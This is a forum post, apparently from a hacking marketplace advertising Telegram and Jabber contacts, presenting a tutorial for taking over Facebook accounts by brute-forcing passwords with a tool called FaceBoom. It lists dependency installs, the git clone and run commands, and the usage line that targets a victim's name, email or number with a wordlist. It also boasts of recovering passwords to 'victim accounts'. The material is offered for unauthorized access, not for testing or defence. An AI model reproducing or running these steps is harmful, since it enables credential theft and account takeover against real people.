DarkStash Support and Advertisement Telegram: @DarkStashMaster
Jabber : [email protected]





Facebook Account Hacking Using Bruteforce 2022

Dein

Registered
Staff Member
Premium User
Hello guys, in this tutorial we are going to talk about a Facebook brute forcing tool called “FaceBoom“. As we know that brute force attack is a well-known cracking method that involves ‘guessing’ usernames and passwords to gain unauthorized access to a system. Likewise, we will perform brute-force attacks on Facebook accounts using this tool to get the right credentials.

Install Dependencies
As we know how important python and pip tools are to control this tool, so you will need to install both tools using the following command.

apt install python && apt install python3 && pkg install python && pkg install python3 && apt install python-pip && apt install python3-pip && pkg install python-pip && pkg install python3-pip

Installation
One more dependency you have to download. After that download, this tool by using the git command, go to the directory and boot this tool by using the python command.

pip install mechanize
git clone https://github.com/Oseid/FaceBoom.git
cd FaceBoom/
python3 faceboom.py

By executing the following command you can check the usage of this tool.

python3 faceboom.py

Brute Force Attack
This tool looks very interesting and at the same time, it works fine. Understand the following command, change the details according to you, and execute it.

Usage !! python3 faceboom.py -t < name/email/number > -w < wordlist >


Nice !! As you can see it has got the correct password to enter the victim accounts and thus we can crack the Facebook account password using the last dictionary.



Note: THIS METHOD OR TUTORIAL ISN'T MINE ALL CREDITS GOES TO
Shubham Goyal
 
Back
Top